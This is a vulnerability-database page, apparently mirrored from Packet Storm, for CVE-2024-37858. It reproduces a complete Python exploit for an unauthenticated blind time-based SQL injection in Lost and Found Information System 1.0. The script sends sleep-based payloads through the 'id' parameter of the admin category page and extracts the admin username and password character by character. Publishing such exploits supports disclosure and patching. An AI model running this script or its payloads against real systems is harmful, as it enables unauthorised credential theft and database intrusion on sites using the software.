Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAmit RoyPACKETSTORM:179079
HistoryJun 13, 2024 - 12:00 a.m.

Lost And Found Information System 1.0 SQL Injection

2024-06-1300:00:00
Amit Roy
packetstormsecurity.com
32
remote attackers
sql injection
blind sql injection
cve-2024-37858
unauthenticated
information system
php
mysql
source code
vulnerability
exploit
apache
kali linux

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON
`# Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System   
# Exploit Author: Amit Roy (Rezur / AR0x7)  
# Date: June 07, 2024  
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip  
# Tested on: Kali Linux, Apache, Mysql  
# Version: v1.0  
# Exploit Description:  
# Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.  
# CVE : CVE-2024-37858  
  
import requests,string,sys,argparse  
  
r = requests.Session()  
proxies = {'http': 'http://127.0.0.1:8080'}  
  
admin_path = "/php-lfis/admin/index.php"  
createCategory_path = "/php-lfis/classes/Master.php"  
  
def char_extract(rhost, payload):  
params = {"page": "categories/manage_category", "id": payload}  
response = r.get(rhost+admin_path, params=params)  
if response.elapsed.total_seconds() > 1:  
return True  
else:  
return False  
  
def sqli(rhost, column):  
charset = string.printable  
output_length = 200  
output = ""  
for i in range(output_length):  
for char in charset:  
# Extracts the credentials of user with id=1, admin by default  
payload = "13371337' or if((char(%s)=(select substring(%s,%s,1) from users where id=1)),sleep(1),1)-- -" % (ord(str(char)),str(column),str(i+1))  
sys.stdout.write(f"\r[*] Extracting: {output}\r")  
if char_extract(rhost, payload):  
output += char  
break  
elif char == '~' and not char_extract(rhost, payload):  
print("[*] Extracting:",output)  
return output  
  
def argsetup():  
about = 'Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'  
parser = argparse.ArgumentParser(description=about)  
parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)  
args = parser.parse_args()  
return args  
  
def main():  
args = argsetup()  
rhost = args.target  
print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))  
  
if __name__ == "__main__":  
main()  
`

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

JSON